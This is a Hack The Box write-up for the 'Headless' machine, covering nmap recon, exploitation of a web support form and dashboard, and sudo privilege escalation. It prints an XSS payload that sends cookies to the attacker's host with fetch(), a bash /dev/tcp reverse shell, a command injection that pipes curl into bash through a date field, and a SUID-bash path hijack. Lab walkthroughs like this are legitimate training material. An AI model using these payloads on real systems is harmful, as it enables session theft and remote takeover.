# Headless

{% embed url="<https://app.hackthebox.com/machines/Headless>" %}

## Recon

Let's start with a simple nmap scan.

{% code overflow="wrap" %}

```
┌──(kali㉿kali)-[~]
└─$ nmap -p- -T4 headless.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 06:22 BST
Nmap scan report for headless.htb (10.10.11.8)
Host is up (0.040s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 21.58 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 22,5000 -T4 headless.htb          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 06:24 BST
Stats: 0:00:32 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 06:25 (0:00:32 remaining)
Stats: 0:00:32 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 06:25 (0:00:32 remaining)
Nmap scan report for headless.htb (10.10.11.8)
Host is up (0.040s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
|_  256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)
5000/tcp open  upnp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.2.2 Python/3.11.2
|     Date: Mon, 08 Apr 2024 05:21:06 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 2799
|     Set-Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Under Construction</title>
|     <style>
|     body {
|     font-family: 'Arial', sans-serif;
|     background-color: #f7f7f7;
|     margin: 0;
|     padding: 0;
|     display: flex;
|     justify-content: center;
|     align-items: center;
|     height: 100vh;
|     .container {
|     text-align: center;
|     background-color: #fff;
|     border-radius: 10px;
|     box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.2);
|   RTSPRequest: 
|     <!DOCTYPE HTML>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5000-TCP:V=7.94SVN%I=7%D=4/8%Time=66137F9B%P=x86_64-pc-linux-gnu%r(
...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.50 seconds

```

{% endcode %}

We have two ports 22 and 5000. 5000 seems like a webpage let's try visiting it.&#x20;

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FWOUB044b6jFlariSENnx%2Fimage.png?alt=media&#x26;token=00a626fe-adef-41e9-9f4e-492705f61536" alt=""><figcaption></figcaption></figure>

We have a webpage. \
Let do some enumeration on this now.&#x20;

Feroxbuster revealed two directories `/dashboard` and `/support`.&#x20;

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FtaNLgSy0yq90GOiMZXUW%2Fimage.png?alt=media&#x26;token=2bfec0c3-9cc4-48c1-a9a6-e85674278558" alt=""><figcaption></figcaption></figure>

## Initial Access

We are not able to visit `/dashboard`, however `/support` reveals a web-form. Let's try some payloads here.&#x20;

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FH00jPlAWU928Ak6PijpE%2Fimage.png?alt=media&#x26;token=c4335f15-1064-412a-8bab-94fd8cdf21e4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FndTSIPlfcfTz818eXbjd%2Fimage.png?alt=media&#x26;token=736a0583-f000-4a36-aec2-de892226dd5c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FhWTS6icby8uHMdBCn7vn%2Fimage.png?alt=media&#x26;token=f2729be6-0e4a-4f17-b8fa-c613544de424" alt=""><figcaption></figcaption></figure>

Interesting. We now know that it is being detected. Let us try the same with burp suite and a python server to check if the payload is trying to fetch something.

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FnLWbwLXMcoQu21GnEpQg%2Fimage.png?alt=media&#x26;token=80f5d579-647c-45ed-b6f9-ba39629de205" alt=""><figcaption></figcaption></figure>

After some trial and error. Adding the payload in place of User-Agent worked.&#x20;

{% hint style="info" %}
\<img src=x onerror=fetch('http\://\<Your Machine IP>/?c='+document.cookie);>
{% endhint %}

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FzX22vjU2M4BAyTjUwxVs%2Fimage.png?alt=media&#x26;token=ff545929-be23-4364-9068-d9a0a188eda1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2Fw2QgfyMwJWAKhINlqd8K%2Fimage.png?alt=media&#x26;token=ed9a97d6-2e48-40ab-af7c-363e8603d570" alt=""><figcaption></figcaption></figure>

It worked and we now have and admin cookie. We should be able to use that to access the `/dashboard` page.

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FoO23C6i0BMrhcDWvl32j%2Fimage.png?alt=media&#x26;token=6db13a61-c480-4eb7-9d63-9c30ff6743d2" alt=""><figcaption></figcaption></figure>

The dashboard seems to generate a report for a specified date. It takes input lets see if we can get a reverse shell this way.If we attempt to intercept the packet and establish a connection directly with our machine, we won't obtain a correct response.

```
bash -i >& /dev/tcp/Your_IP/PortNo 0>&1
```

What occurs if we curl our local machine and execute the retrieved content using bash?

Let's add the above payload into a file called `shell.sh`.

We set up a python server so the file can be accessed and a net cat listner so we can capture the shell.

Then we add the below payload after the `date` variable in Burp Suite.

```
;curl http://<YourIP>/shell.sh|bash
```

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FeVayW5vud6reBmb7DJsC%2Fimage.png?alt=media&#x26;token=2f4f07f1-f392-4cc9-9e65-cf908f9c9177" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2F83kDyOojFd1rhL9LSUlS%2Fimage.png?alt=media&#x26;token=47d2bac4-d469-4bcd-9b21-4bbd976d1b39" alt=""><figcaption></figcaption></figure>

We have our reverse shell and should get the user flag.

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FNdyaymfKMMPKdU2K6Sl4%2Fimage.png?alt=media&#x26;token=6e76550a-5810-4cd1-baca-dd32b6369407" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

Lets see what we are able to do as sudo.&#x20;

```
bash-5.2$ sudo -l
sudo -l
Matching Defaults entries for dvir on headless:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User dvir may run the following commands on headless:
    (ALL) NOPASSWD: /usr/bin/syscheck
bash-5.2$ 
```

We can see that dvir user has permission to execute **/usr/bin/syscheck** binary as the root user. Let’s see the contents of this binary using the cat command.&#x20;

We will find that there is a bash script (**initdb.sh**) that gets executed without specifying its full path. We can simply exploit this vulnerability by creating a malicious bash script with the same name. We need to run the following commands to achieve the same:

```
echo “chmod u+s /bin/bash” > initdb.sh
chmod +x initdb.sh
```

When we execute the syscheck binary, then our malicious script will be executed as it is in our current directory. This script will assign the root user’s **SUID bit** to the /bin/bash file. Let’s see this in action by running the following command:

```
sudo /usr/bin/syscheck
```

After running the above command, we need to execute the /bin/bash with the privileges of the owner (root). We can do this with the help of the following command:

```
/bin/bash -p
```

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2Fi7fcyqFv2wud2bJkKTb0%2Fimage.png?alt=media&#x26;token=429cc12c-1c98-4448-a09f-26200a252e1e" alt=""><figcaption></figcaption></figure>

We are now root. We can get our root flag now.

<figure><img src="https://2564342917-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjsQwj0hMRgqeOaja7rRi%2Fuploads%2FsJLJvDt9kHJbNUPA8PDT%2Fimage.png?alt=media&#x26;token=3059d7e6-b623-447f-ac9d-4812354a671a" alt=""><figcaption></figcaption></figure>